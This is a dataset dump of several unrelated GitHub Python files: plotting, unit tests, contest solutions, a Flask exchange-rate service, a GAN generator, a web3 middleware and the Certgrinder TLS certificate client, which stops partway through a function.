$K_p=3.6$\"\nax27.text(40, -10, step27_tex, fontdict=font)\n\nfor ax in [ax2, ax6, ax7, ax11, ax13, ax18, ax27]:\n ax.xaxis.set_minor_locator(AutoMinorLocator())\n\t #ax.yaxis.set_minor_locator(ticker.AutoMinorLocator())\n ax.set_facecolor(\"#F8E0C1\")\n # Move the left and bottom spines to x = 0 and y = 0, respectively.\n ax.spines[\"left\"].set_position((\"data\", 0))\n ax.spines[\"bottom\"].set_position((\"data\", 0))\n # Hide the top and right spines.\n ax.spines[\"top\"].set_visible(False)\n\n ax.spines[\"right\"].set_visible(False)\n\n ax.plot(1, 0, \">k\", ms=12, transform=ax.get_yaxis_transform(), clip_on=False)\n ax.plot(0, 1, \"^k\", ms=12, transform=ax.get_xaxis_transform(), clip_on=False)\n ax.set_xlabel(xlabel=\"Time\", fontsize=15)\n ax.set_ylabel(ylabel=\"Position(%)\", rotation=\"horizontal\", fontsize=15)\n ax.yaxis.set_label_coords(0.05,1.03)\n ax.xaxis.set_label_coords(1.04,0.0)\n ax.tick_params(axis=\"both\", which=\"major\", labelsize=15)\n ax.xaxis.set_label_coords(1.045,0.3)\n\n\nplt.show()\n\n","repo_name":"sayedul79/python-control-system","sub_path":"angular-position-control-lab-6.py","file_name":"angular-position-control-lab-6.py","file_ext":"py","file_size_in_byte":6027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} 
+{"seq_id":"11702126603","text":"import unittest\nimport numpy as np\n\nimport sys\nsys.path.append('C:\\\\Users\\\\Xinran\\\\Desktop\\\\cnn\\\\src\\\\')\nsys.path.append('C:\\\\Users\\\\Xinran\\\\Desktop\\\\cnn\\\\src\\\\layer\\\\')\n\nfrom net import Net\nfrom fc import FullyConnectedLayer as FC\n\nclass TestNet(unittest.TestCase):\n def test_init(self):\n config = {\n 'input_shape' : [3, 5, 5]\n , 'step_size' : 1\n , 'mu' : 0.9\n , 'step_decay' : 0.9\n }\n n = Net(config)\n\n def test_add_layer(self):\n config = {\n 'input_shape' : [3, 5, 5]\n , 'step_size' : 1\n , 'mu' : 0.9\n , 'step_decay' : 0.9\n }\n n = Net(config)\n l = FC(10)\n n.add(l)\n\n def test_train_iteration(self):\n config = {\n 'input_shape' : [3, 5, 5]\n , 'step_size' : 1\n , 'mu' : 0.9\n , 'step_decay' : 0.9\n }\n n = Net(config)\n l = FC(10)\n n.add(l)\n x = np.random.random([1, 3, 5, 5]).reshape(1, -1)\n y = np.array([0])\n loss = n.train_one_iteration(x, y)\n \n def test_fit(self):\n config = {\n 'input_shape' : [3, 5, 5]\n , 'step_size' : 1\n , 'mu' : 0.9\n , 'step_decay' : 0.9\n }\n n = Net(config)\n l = FC(10)\n n.add(l)\n x = np.random.random([1, 3, 5, 5]).reshape(1, -1)\n y = np.array([0])\n n.fit(x, y, 10)\n \n\nif __name__ == \"__main__\":\n unittest.main()","repo_name":"huxinran/cnn","sub_path":"test/net_test.py","file_name":"net_test.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"1207836787","text":"from string import ascii_lowercase\nfrom sys import stdin,stdout\ninput = lambda : stdin.readline().rstrip()\nprint =lambda x : stdout.write(str(x))\n\nfor _ in range(int(input())):\n n = int(input())\n n = (n*2)+1\n count = {i:0 for i in ascii_lowercase}\n\n # we are only getting the first alphabet that is of odd length\n # this is because the first character occurance will be as follows:\n # 1 + x + y + z + z + x - y [for a 4 long string]\n # when we use association property it becomes:\n # 1 + 2(x + z) \n # therefore we can conclude that the first letter will be of odd decent and other letters will be of even decent.\n\n for i in range(n):\n for j in input():\n count[j] += 1\n\n for i in sorted(count):\n if count[i]&1:\n print(i+\"\\n\")\n break","repo_name":"ironnicko/competitive","sub_path":"ManipulatingHistory.py","file_name":"ManipulatingHistory.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"73345926710","text":"import math\n\n\ndef get_distance(t1, f1, t2, f2, a, b):\n if t1 == t2:\n return int(math.fabs(f2 - f1))\n d = int(math.fabs(t1 - t2))\n h = f1\n if f1 > b:\n d += f1 - b\n h = b\n elif f1 < a:\n d += a - f1\n h = a\n if f2 != h:\n d += int(math.fabs(f2 - h))\n return d\n\n\nn, h, a, b, k = map(int, input().split())\nfor i in range(0, k):\n t1, f1, t2, f2 = map(int, input().split())\n print(get_distance(t1, f1, t2, f2, a, b))\n","repo_name":"AishwaryaRK/Code","sub_path":"CodeForces/tower_floor_distance.py","file_name":"tower_floor_distance.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"33188999174","text":"# coding=utf-8\nimport datetime\nimport logging\nimport ujson\nfrom flask import Response\nimport pytz\nimport requests\nfrom flask import Blueprint, request, current_app\nfrom sqlalchemy import desc\n\nfrom fx.common import cache\nfrom fx.common import errors\nfrom 
fx.database.db import session_scope\nfrom fx.models.storage import Transactions\n\nlogger = logging.getLogger(__name__)\n\nbp = Blueprint('fx', __name__)\nhttp_session = requests.session()\n\n\ndef safe_to_float(obj):\n try:\n return float(obj)\n except Exception as e:\n logger.debug(repr(e))\n\n\ndef safe_to_int(obj):\n \"\"\"\n returns the integer value or None\n :param obj:\n :return:\n \"\"\"\n try:\n return int(obj)\n except Exception as e:\n logger.debug(repr(e))\n\n\ndef validate_post_request(data):\n \"\"\"\n validates the request body. It should probably reside somewhere else\n :param data:\n :return: tuple of (data, error) - error is None if the body is valid.\n \"\"\"\n\n # we could look in all currency symbols to make it better, but I don't have all the symbols available\n resp = {}\n if \"currency\" in data and type(data[\"currency\"]) is str and len(data[\"currency\"]) == 3:\n resp[\"currency\"] = data[\"currency\"].upper()\n else:\n return None, errors.INVALID_SYMBOL\n\n if \"amount\" in data and type(safe_to_float(data[\"amount\"])) in (int, float):\n resp[\"amount\"] = safe_to_float(data[\"amount\"])\n else:\n return None, errors.INVALID_AMOUNT\n\n return resp, None\n\n\ndef validate_get_request(data):\n \"\"\"\n validates the GET request\n :param data:\n :return: tuple of (data, error).\n \"\"\"\n\n # we could look in all currency symbols to make it better, but I don't have all the symbols available\n resp = {}\n if \"currency\" in data and type(data[\"currency\"]) is str and len(data[\"currency\"]) == 3:\n resp[\"currency\"] = data[\"currency\"].upper()\n elif \"currency\" in data:\n return None, errors.INVALID_SYMBOL\n\n if \"limit\" in data and type(safe_to_int(data[\"limit\"])) is int:\n resp[\"limit\"] = safe_to_int(data[\"limit\"])\n elif \"limit\" in data:\n return None, errors.INVALID_AMOUNT\n\n return resp, None\n\n\n@bp.route('/grab_and_save', methods=[\"POST\"])\ndef save_rate():\n try:\n if request.is_json is False:\n return Response(ujson.dumps(errors.BAD_REQUEST), 400, content_type='application/json')\n\n data, error = validate_post_request(request.json)\n if error:\n return Response(ujson.dumps(error), 400, content_type='application/json')\n\n currency = data.get(\"currency\").upper()\n amount = data.get(\"amount\")\n\n oxr_resp = http_session.get(url=\"{}&symbols={}&pretty_print=false\".format(current_app.config[\"OPENEXCHANGE_URL\"],\n currency))\n oxr_data = oxr_resp.json()\n\n with session_scope() as session:\n # save to the database\n st = Transactions(\n currency=currency,\n amount=amount,\n rate=oxr_data[\"rates\"][currency],\n rate_at=pytz.utc.localize(datetime.datetime.utcfromtimestamp(oxr_data[\"timestamp\"])),\n created_at=pytz.utc.localize(datetime.datetime.utcnow()))\n st.amount_usd = round(amount * oxr_data[\"rates\"][currency], 9)\n\n session.add(st)\n session.commit()\n\n # write to redis\n cache.save_to_redis({\n \"currency\": currency,\n \"amount_usd\": st.amount_usd,\n \"amount\": st.amount,\n \"rate_at\": st.rate_at,\n \"rate\": st.rate,\n \"created_at\": st.created_at,\n })\n\n return Response(\"{}\", 201, content_type='application/json')\n\n except Exception as e:\n logger.exception(e)\n return Response(ujson.dumps(errors.INTERNAL_SERVER_ERROR), 500, content_type='application/json')\n\ndef make_dict(storage_obj):\n \"\"\"\n converts a Transactions row into a plain dict\n :param storage_obj:\n :return:\n \"\"\"\n resp = dict()\n resp[\"created_at\"] = storage_obj.created_at\n resp[\"rate\"] = storage_obj.rate\n resp[\"rate_at\"] = storage_obj.rate_at\n resp[\"currency\"] = 
storage_obj.currency\n resp[\"amount\"] = storage_obj.amount\n resp[\"amount_usd\"] = storage_obj.amount_usd\n\n return resp\n\n\n@bp.route('/last', methods=[\"GET\"])\ndef get_last_transactions():\n # circular dependency hack\n\n try:\n data, error = validate_get_request(request.args)\n if error:\n return Response(ujson.dumps(error), 400, content_type='application/json')\n\n currency = data.get(\"currency\", '').upper()\n limit = data.get(\"limit\", 1)\n if limit > 100:\n limit = 100\n\n with session_scope() as session:\n if currency:\n db_data = session.query(Transactions).filter(Transactions.currency == currency).order_by(desc(Transactions.created_at)).limit(limit).all()[:]\n redis_data = cache.get_data(currency, limit)\n else:\n db_data = session.query(Transactions).order_by(desc(Transactions.created_at)).limit(limit).all()[:]\n redis_data = cache.get_data(\"transactions\", limit-1)\n\n db_data = [make_dict(item) for item in db_data]\n\n return Response(ujson.dumps({\n \"request\": request.args,\n \"data\":[\n {\"source\": \"mysql\", \"transactions\": db_data},\n {\"source\": \"redis\", \"transactions\": redis_data}\n ]}), 200, content_type='application/json')\n\n except Exception as e:\n logger.exception(e)\n return Response(ujson.dumps(errors.INTERNAL_SERVER_ERROR), 500, content_type='application/json')\n","repo_name":"lismanb/fx","sub_path":"fx/views/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"12438000317","text":"import torch.nn as nn\n\nclass Generator(nn.Module):\n def __init__(self, image_size, hidden_size=256, latent_size=64):\n super(Generator, self).__init__()\n self.model = nn.Sequential(\n nn.Linear(latent_size, hidden_size),\n nn.LeakyReLU(0.2),\n nn.Linear(hidden_size, hidden_size),\n nn.LeakyReLU(0.2),\n nn.Linear(hidden_size, image_size),\n nn.Tanh(),\n )\n\n def forward(self, x):\n return self.model(x)\n","repo_name":"alifa98/Supercalifragilisticexpialidocious","sub_path":"GAN/model/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"30202058228","text":"from typing import (\n TYPE_CHECKING,\n Any,\n Callable,\n)\n\nfrom utils_eth.curried import (\n apply_formatter_if,\n apply_formatters_to_dict,\n apply_key_map,\n is_null,\n)\nfrom utils_eth.toolz import (\n complement,\n compose,\n)\nfrom hexbytes import (\n HexBytes,\n)\n\nfrom eth_web3._utils.rpc_abi import (\n RPC,\n)\nfrom eth_web3.middleware.formatting import (\n async_construct_formatting_middleware,\n construct_formatting_middleware,\n)\nfrom eth_web3.types import (\n AsyncMiddleware,\n RPCEndpoint,\n)\n\nif TYPE_CHECKING:\n from eth_web3 import Web3 # noqa: F401\n\nis_not_null = complement(is_null)\n\nremap_geth_poa_fields = apply_key_map(\n {\n \"extraData\": \"proofOfAuthorityData\",\n }\n)\n\npythonic_geth_poa = apply_formatters_to_dict(\n {\n \"proofOfAuthorityData\": HexBytes,\n }\n)\n\ngeth_poa_cleanup = compose(pythonic_geth_poa, remap_geth_poa_fields)\n\n\ngeth_poa_middleware = construct_formatting_middleware(\n result_formatters={\n RPC.eth_getBlockByHash: apply_formatter_if(is_not_null, geth_poa_cleanup),\n RPC.eth_getBlockByNumber: apply_formatter_if(is_not_null, geth_poa_cleanup),\n },\n)\n\n\nasync def async_geth_poa_middleware(\n make_request: Callable[[RPCEndpoint, Any], Any], w3: \"Web3\"\n) -> AsyncMiddleware:\n middleware = await 
async_construct_formatting_middleware(\n result_formatters={\n RPC.eth_getBlockByHash: apply_formatter_if(is_not_null, geth_poa_cleanup),\n RPC.eth_getBlockByNumber: apply_formatter_if(is_not_null, geth_poa_cleanup),\n },\n )\n return await middleware(make_request, w3)\n","repo_name":"Foundation-Eth/eth-web3","sub_path":"eth_web3/middleware/geth_poa.py","file_name":"geth_poa.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"94"} +{"seq_id":"22635728370","text":"#!/usr/bin/env python\n\"\"\"Certgrinder module.\n\nSee https://certgrinder.readthedocs.io/en/latest/certgrinder.html\nand https://github.com/tykling/certgrinder for more.\n\"\"\"\nimport argparse\nimport base64\nimport binascii\nimport datetime\nimport hashlib\nimport logging\nimport logging.handlers\nimport os\nimport random\nimport shlex\nimport subprocess\nimport sys\nimport tempfile\nimport time\nimport typing\nfrom importlib.metadata import PackageNotFoundError, version\nfrom pprint import pprint\n\nimport cryptography.x509\nimport dns.resolver # type: ignore\nimport yaml\nfrom cryptography.hazmat import primitives\nfrom cryptography.hazmat.backends import default_backend, openssl\nfrom cryptography.x509 import ocsp\nfrom pid import PidFile # type: ignore\n\nlogger = logging.getLogger(\"certgrinder.%s\" % __name__)\n\n# get version number from package metadata if possible\n__version__: str = \"0.0.0\"\n\"\"\"The value of this variable is taken from the Python package registry, and if that fails from the ``_version.py`` file written by ``setuptools_scm``.\"\"\"\n\ntry:\n __version__ = version(\"certgrinder\")\nexcept PackageNotFoundError:\n # package is not installed, get version from file\n try:\n from _version import version as __version__ # type: ignore\n except ImportError:\n # this must be a git checkout with no _version.py file, version unknown\n pass\n\n\nclass Certgrinder:\n \"\"\"The Certgrinder client class.\"\"\"\n\n # save version as a class attribute\n __version__ = __version__\n\n def __init__(self) -> None:\n \"\"\"Define the default config.\"\"\"\n self.conf: typing.Dict[str, typing.Union[str, int, bool, typing.List[str]]] = {\n \"alternate-chain\": False,\n \"caa-validation-methods\": \"dns-01,http-01\",\n \"certgrinderd\": \"certgrinderd\",\n \"cert-renew-threshold-days\": 30,\n \"domain-list\": [],\n \"invalid-ca-cn-list\": [\n \"Fake LE Intermediate X1\",\n \"Fake LE Intermediate X2\",\n ],\n \"key-type-list\": [\"rsa\", \"ecdsa\"],\n \"log-level\": \"INFO\",\n \"name-server\": \"\",\n \"ocsp-renew-threshold-percent\": 50,\n \"path\": \"\",\n \"periodic-sleep-minutes\": 60,\n \"pid-dir\": \"/tmp\",\n \"post-renew-hooks\": [],\n \"post-renew-hooks-dir\": \"\",\n \"post-renew-hooks-dir-runner\": \"\",\n \"staging\": False,\n \"syslog-facility\": \"\",\n \"syslog-socket\": \"\",\n \"tlsa-port\": \"\",\n \"tlsa-protocol\": \"\",\n \"tlsa-type-list\": [\"310\", \"311\", \"312\"],\n }\n\n # current domainset\n self.domainset: typing.List[str] = []\n\n # paths for current certificate and keys\n self.keypair_path: str = \"\"\n self.csr_path: str = \"\"\n self.certificate_path: str = \"\"\n self.certificate_chain_path: str = \"\"\n self.issuer_path: str = \"\"\n self.concat_path: str = \"\"\n self.ocsp_response_path: str = \"\"\n\n # this is set to True if an error occurs\n self.error: bool = False\n\n # this is set to True if we need to run a post renew hook\n self.hook_needed: bool = False\n\n def configure(\n self,\n 
userconfig: typing.Dict[str, typing.Union[str, int, bool, typing.List[str]]],\n ) -> None:\n \"\"\"Merge and check configuration and configure logging.\n\n Merge the supplied userconfig dict with the default config,\n check for missing required settings, and configure logging and syslog.\n\n Args:\n userconfig: dict of the config to be merged with the default config\n\n Returns:\n None\n \"\"\"\n # merge default config with userconfig\n self.conf.update(userconfig)\n\n # define the log format used for stdout depending on the requested loglevel\n if self.conf[\"log-level\"] == \"DEBUG\":\n console_logformat = \"%(asctime)s certgrinder %(levelname)s Certgrinder.%(funcName)s():%(lineno)i: %(message)s\"\n else:\n console_logformat = \"%(asctime)s certgrinder %(levelname)s %(message)s\"\n\n # configure the log format used for console\n logging.basicConfig(\n level=getattr(logging, str(self.conf[\"log-level\"])),\n format=console_logformat,\n datefmt=\"%Y-%m-%d %H:%M:%S %z\",\n )\n\n # check if we have a domain-list\n if not self.conf[\"domain-list\"]:\n logger.error(\n \"No domain-list(s) configured. Specify --domain-list example.com[,www.example.com] (once per certificate) or define domain-list: in the config file.\"\n )\n sys.exit(1)\n\n # check if we have a path\n if not self.conf[\"path\"]:\n logger.error(\n \"No configured path. Specify --path or define path: in the config file.\"\n )\n sys.exit(1)\n\n # check if configured path exists\n if not os.path.exists(str(self.conf[\"path\"])):\n logger.error(f\"Configured path {self.conf['path']} does not exist\")\n sys.exit(1)\n\n # check if configured path is writable\n try:\n with tempfile.TemporaryFile(dir=str(self.conf[\"path\"])) as _:\n pass\n except PermissionError:\n logger.error(\n f\"Permission error while accessing configured path {self.conf['path']}\"\n )\n sys.exit(1)\n\n # connect to syslog?\n if self.conf[\"syslog-socket\"] and self.conf[\"syslog-facility\"]:\n facility: int = getattr(\n logging.handlers.SysLogHandler, str(self.conf[\"syslog-facility\"])\n )\n syslog_handler = logging.handlers.SysLogHandler(\n address=str(self.conf[\"syslog-socket\"]), facility=facility\n )\n syslog_format = logging.Formatter(\"certgrinder: %(message)s\")\n syslog_handler.setFormatter(syslog_format)\n logger.addHandler(syslog_handler)\n # usually SysLogHandler is lazy and doesn't connect the socket until\n # a message has to be sent. Call _connect_unixsocket() now to force\n # an exception now if we can't connect to the socket\n syslog_handler._connect_unixsocket( # type: ignore\n self.conf[\"syslog-socket\"]\n )\n else:\n logger.debug(\"Not configuring syslog\")\n\n # is this staging mode?\n if self.conf[\"staging\"]:\n logger.debug(\n \"Staging mode enabled. 
Setting acme-server-url to 'https://acme-staging-v02.api.letsencrypt.org/directory' and invalid-ca-cn-list to an empty list.\"\n )\n self.conf[\n \"acme-server-url\"\n ] = \"https://acme-staging-v02.api.letsencrypt.org/directory\"\n self.conf[\"invalid-ca-cn-list\"] = []\n # set preferred-chain based on the value of alternate-chain\n if self.conf[\"alternate-chain\"]:\n # one intermediate\n self.conf[\"preferred-chain\"] = \"Fake_LE_Root_X2\"\n else:\n # two intermediates\n self.conf[\"preferred-chain\"] = \"Fake_LE_Root_X1\"\n else:\n # set preferred-chain based on the value of alternate-chain\n if self.conf[\"alternate-chain\"]:\n # the alternate chain has one intermediate\n self.conf[\"preferred-chain\"] = \"ISRG_Root_X1\"\n else:\n # the default chain has two intermediates\n self.conf[\"preferred-chain\"] = \"DST_Root_CA_X3\"\n\n if self.conf[\"preferred-chain\"] in [\"DST_Root_CA_X3\", \"Fake_LE_Root_X1\"]:\n # two intermediates\n self.conf[\"expected-chain-length\"] = 3\n else:\n # one intermediate\n self.conf[\"expected-chain-length\"] = 2\n\n logger.debug(\n f\"Certgrinder {__version__} configured OK - running with config: {self.conf}\"\n )\n\n # RSA KEY METHODS\n\n @staticmethod\n def load_keypair(\n path: str,\n ) -> typing.Union[\n openssl.rsa._RSAPrivateKey, primitives.asymmetric.ed25519.Ed25519PrivateKey\n ]:\n \"\"\"Load keypair bytes from disk, load key and return the object.\n\n Fixes keypair permissions to 640 if they are not 640.\n\n Args:\n path: The path to load the keypair from\n\n Returns:\n The keypair object\n \"\"\"\n # check permissions for self.keypair_path and fix to 640 if needed\n if oct(os.stat(path).st_mode)[4:] != \"0640\":\n logger.warning(\n f\"Keypair {path} has incorrect permissions, fixing to 0640...\"\n )\n os.chmod(path, 0o640)\n\n # read keypair\n with open(path, \"rb\") as f:\n keypair_bytes = f.read()\n\n # parse and return keypair\n return primitives.serialization.load_pem_private_key(\n keypair_bytes, password=None, backend=default_backend()\n )\n\n @staticmethod\n def generate_private_key(\n keytype: str,\n ) -> typing.Union[\n openssl.rsa._RSAPrivateKey,\n openssl.ec._EllipticCurvePrivateKey,\n primitives.asymmetric.ed25519.Ed25519PrivateKey,\n ]:\n \"\"\"Generate and returns a private key.\n\n Args:\n keytype: \"rsa\" for RSA key, \"ecdsa\" for ECDSA and \"ed25519\" for ed25519\n\n Returns:\n The keypair object\n\n Raises:\n ValueError: For unsupported keytypes\n \"\"\"\n if keytype == \"rsa\":\n return primitives.asymmetric.rsa.generate_private_key(\n public_exponent=65537, key_size=4096, backend=default_backend()\n )\n elif keytype == \"ecdsa\":\n return primitives.asymmetric.ec.generate_private_key(\n primitives.asymmetric.ec.SECP384R1(),\n backend=default_backend(),\n )\n elif keytype == \"ed25519\":\n return primitives.asymmetric.ed25519.Ed25519PrivateKey.generate()\n else:\n raise ValueError(f\"Unsupported keytype: {keytype}\")\n\n @staticmethod\n def save_keypair(\n keypair: typing.Union[\n openssl.rsa._RSAPrivateKey, primitives.asymmetric.ed25519.Ed25519PrivateKey\n ],\n path: str,\n ) -> None:\n \"\"\"Save keypair to disk.\n\n Args:\n keypair: The keypair to save\n path: The path to save the keypair in\n\n Returns:\n None\n\n Raises:\n ValueError: For unsupported keytypes\n \"\"\"\n if isinstance(keypair, openssl.rsa._RSAPrivateKey):\n keyformat = primitives.serialization.PrivateFormat.TraditionalOpenSSL\n elif isinstance(keypair, primitives.asymmetric.ed25519.Ed25519PrivateKey):\n keyformat = 
primitives.serialization.PrivateFormat.PKCS8\n elif isinstance(keypair, openssl.ec._EllipticCurvePrivateKey):\n keyformat = primitives.serialization.PrivateFormat.PKCS8\n else:\n raise ValueError(f\"Unsupported keytype: {type(keypair)}\")\n\n with open(path, \"wb\") as f:\n f.write(\n keypair.private_bytes(\n encoding=primitives.serialization.Encoding.PEM,\n format=keyformat,\n encryption_algorithm=primitives.serialization.NoEncryption(),\n )\n )\n os.chmod(path, 0o640)\n\n @staticmethod\n def get_der_pubkey(\n keypair: typing.Union[\n openssl.rsa._RSAPrivateKey, primitives.asymmetric.ed25519.Ed25519PrivateKey\n ]\n ) -> bytes:\n \"\"\"Return the DER formatted publickey.\n\n Args:\n keypair: The keypair which contains the public key\n\n Returns:\n The bytes representing the DER formatted public key\n \"\"\"\n derbytes: bytes = keypair.public_key().public_bytes(\n encoding=primitives.serialization.Encoding.DER,\n format=primitives.serialization.PublicFormat.SubjectPublicKeyInfo,\n )\n return derbytes\n\n # CSR METHODS\n\n @staticmethod\n def generate_csr(\n keypair: typing.Union[\n openssl.rsa._RSAPrivateKey, primitives.asymmetric.ed25519.Ed25519PrivateKey\n ],\n domains: typing.List[str],\n ) -> cryptography.x509.CertificateSigningRequest:\n \"\"\"Generate and return a new CSR based on the public key and list of domains.\n\n Only set CN since everything else is removed by LetsEncrypt in the certificate anyway.\n Add all domains in subjectAltName, including the one put into CN.\n\n Args:\n keypair: The keypair to base the CSR on\n domains: A list of domains to put in the CSR. First in the list will be cert CN.\n\n Returns:\n The CSR object\n \"\"\"\n # build list of cryptography.x509.DNSName objects for SAN\n x509_name_list: typing.List[cryptography.x509.GeneralName] = []\n for domain in domains:\n domain = domain.encode(\"idna\").decode(\"utf-8\")\n logger.debug(\"Adding %s to CSR...\" % domain)\n x509_name_list.append(cryptography.x509.DNSName(domain))\n\n # build the CSR\n csr = (\n cryptography.x509.CertificateSigningRequestBuilder()\n .subject_name(\n cryptography.x509.Name(\n [\n cryptography.x509.NameAttribute(\n cryptography.x509.oid.NameOID.COMMON_NAME,\n domains[0].encode(\"idna\").decode(\"utf-8\"),\n )\n ]\n )\n )\n .add_extension(\n cryptography.x509.SubjectAlternativeName(x509_name_list),\n # TODO: should SubjectAltName be critical?\n critical=False,\n )\n .sign(\n keypair,\n primitives.hashes.SHA256(),\n default_backend(),\n )\n )\n return csr\n\n @staticmethod\n def save_csr(csr: cryptography.x509.CertificateSigningRequest, path: str) -> None:\n \"\"\"Save the PEM version of the CSR to the path.\n\n chmods the file 644 after writing.\n\n Args:\n csr: The CSR to be saved\n path: The path to save the CSR to\n\n Returns:\n None\n \"\"\"\n with open(path, \"wb\") as f:\n f.write(csr.public_bytes(primitives.serialization.Encoding.PEM))\n os.chmod(path, 0o644)\n\n # CERTIFICATE METHODS\n\n def load_certificates(\n self, path: str\n ) -> typing.List[cryptography.x509.Certificate]:\n \"\"\"Reads PEM certificate data from the path, parses the certificate(s), and returns them in a list.\n\n Args:\n path: The path to read the PEM certificate(s) from\n\n Returns:\n A list of cryptography.x509.Certificate objects\n \"\"\"\n with open(path, \"rb\") as f:\n pem_bytes = f.read()\n cert_bytes_list = self.split_pem_chain(pem_bytes)\n certificates = []\n for certbytes in cert_bytes_list:\n certificate = self.parse_certificate(certbytes)\n if not certificate:\n # something went wrong while 
parsing this certificate,\n # just return an empty list\n return []\n certificates.append(certificate)\n return certificates\n\n @staticmethod\n def check_certificate_issuer(\n certificate: cryptography.x509.Certificate, invalid_ca_cn_list: typing.List[str]\n ) -> bool:\n \"\"\"Check the issuer of the certificate.\n\n Args:\n certificate: The certificate to check\n invalid_ca_cn_list: The list of CA CommonName strings to consider invalid\n\n Returns:\n True if the certificate issuer CN is not in invalid_ca_cn_list\n \"\"\"\n # Return False if the certificate was issued by itself\n if certificate.issuer == certificate.subject:\n logger.debug(\"This certificate is selfsigned, returning False\")\n return False\n\n # do we have any invalid CA CNs? otherwise bail out now\n if not invalid_ca_cn_list:\n logger.debug(\"We have an empty invalid_ca_cn_list, returning True\")\n return True\n\n # check if certificate was issued by an invalid CA CN\n for x in certificate.issuer:\n if (\n x.oid == cryptography.x509.oid.NameOID.COMMON_NAME\n and x.value in invalid_ca_cn_list\n ):\n logger.debug(\n f\"This certificate was issued by a CA CN ({x.value}) in invalid_ca_cn_list ({invalid_ca_cn_list}), check_certificate_issuer() returning False\"\n )\n return False\n\n # all good\n return True\n\n @staticmethod\n def check_certificate_expiry(\n certificate: cryptography.x509.Certificate, threshold_days: int\n ) -> bool:\n \"\"\"Check the remaining validity of the certificate.\n\n Args:\n certificate: The certificate to check\n threshold_days: The lowest number of remaining days of validity that is considered valid\n\n Returns:\n True if remaining certificate lifetime is >= threshold_days, False if not\n \"\"\"\n expiredelta = certificate.not_valid_after - datetime.datetime.now()\n if expiredelta.days < threshold_days:\n return False\n else:\n return True\n\n @staticmethod\n def check_certificate_public_key(\n certificate: cryptography.x509.Certificate,\n public_key: typing.Union[\n openssl.rsa._RSAPublicKey, primitives.asymmetric.ed25519.Ed25519PublicKey\n ],\n ) -> bool:\n \"\"\"Make sure certificate has the specified public key.\n\n Args:\n certificate: The certificate to check\n public_key: The public key\n\n Returns:\n True if the public key matches, False if not\n \"\"\"\n return bool(\n public_key.public_bytes(\n encoding=primitives.serialization.Encoding.PEM,\n format=primitives.serialization.PublicFormat.SubjectPublicKeyInfo,\n )\n == certificate.public_key().public_bytes(\n encoding=primitives.serialization.Encoding.PEM,\n format=primitives.serialization.PublicFormat.SubjectPublicKeyInfo,\n )\n )\n\n @staticmethod\n def check_certificate_subject(\n certificate: cryptography.x509.Certificate, subject: cryptography.x509.Name\n ) -> bool:\n \"\"\"Make sure the certificate has the specified subject.\n\n Args:\n certificate: The certificate to check\n subject: The subject to expect\n\n Returns:\n True if the subject matches the cert, False if not\n \"\"\"\n return str(certificate.subject) == str(subject)\n\n @staticmethod\n def check_certificate_san_names(\n certificate: cryptography.x509.Certificate, san_names: typing.List[str]\n ) -> bool:\n \"\"\"Make sure the certificate has the provided list of names as SAN.\n\n Args:\n certificate: The certificate to check\n san_names: A list of the names to expect\n\n Returns:\n True if all san_names were found in the cert, and no others.\n \"\"\"\n cert_san = certificate.extensions.get_extension_for_oid(\n cryptography.x509.ExtensionOID.SUBJECT_ALTERNATIVE_NAME\n 
).value\n # make mypy happy\n assert isinstance(cert_san, cryptography.x509.SubjectAlternativeName)\n cert_san_names = cert_san.get_values_for_type(cryptography.x509.DNSName)\n\n # make sure san_names list is idna encoded\n san_names = [name.encode(\"idna\").decode(\"ascii\") for name in san_names]\n\n # if there is a difference between the sets we want to return False\n return not bool(set(cert_san_names).symmetric_difference(san_names))\n\n @classmethod\n def check_certificate_validity(\n cls,\n certificate: cryptography.x509.Certificate,\n invalid_ca_cn_list: typing.List[str],\n threshold_days: int,\n san_names: typing.List[str],\n public_key: typing.Optional[\n typing.Union[\n openssl.rsa._RSAPublicKey,\n primitives.asymmetric.ed25519.Ed25519PublicKey,\n ]\n ] = None,\n subject: typing.Optional[cryptography.x509.Name] = None,\n ) -> bool:\n \"\"\"Perform a few sanity checks of the certificate.\n\n - Check that the issuer is valid\n - Check that the certificate expiry is not exceeded\n - Check that the public key is correct (if provided)\n - Check that the subject is correct (if provided)\n - Check that the SubjectAltName data is correct\n\n Args:\n certificate: The certificate to check\n invalid_ca_cn_list: A list of CA CommonNames to consider invalid\n threshold_days: The minimum number of remaining days lifetime to be considered valid.\n san_names: A list of domain names to expect in SubjectAltName of the certificate.\n public_key: The public key to expect in the certificate (optional).\n subject: The subject to expect in the certificate (optional).\n\n Returns:\n False if a problem is found, True if all is well.\n \"\"\"\n if not cls.check_certificate_issuer(certificate, invalid_ca_cn_list):\n logger.error(\n f\"Certificate is self-signed or the issuer {certificate.issuer} CN is on our list of invalid CAs: {invalid_ca_cn_list}.\"\n )\n return False\n if not cls.check_certificate_expiry(certificate, threshold_days):\n logger.error(f\"Certificate expires in less than {threshold_days} days\")\n return False\n if public_key and not cls.check_certificate_public_key(certificate, public_key):\n logger.error(\"Certificate public key is different from the expected\")\n return False\n if subject and not cls.check_certificate_subject(certificate, subject):\n logger.error(\"Certificate subject is different from the expected\")\n return False\n if not cls.check_certificate_san_names(certificate, san_names):\n logger.error(\n f\"Certificate SAN name list is different from the expected: {san_names}\"\n )\n return False\n logger.debug(\"Certificate is OK, returning True\")\n return True\n\n @staticmethod\n def save_certificate(\n certificate: cryptography.x509.Certificate,\n path: str,\n issuers: typing.List[cryptography.x509.Certificate] = [],\n ) -> None:\n \"\"\"Save the PEM certificate to the path, optionally with an issuer chain.\n\n Args:\n certificate: The certificate to save\n path: The path to save the certificate in\n issuers: The list of issuer certificates to write after the certificate (if any)\n\n Returns:\n None\n \"\"\"\n with open(path, \"wb\") 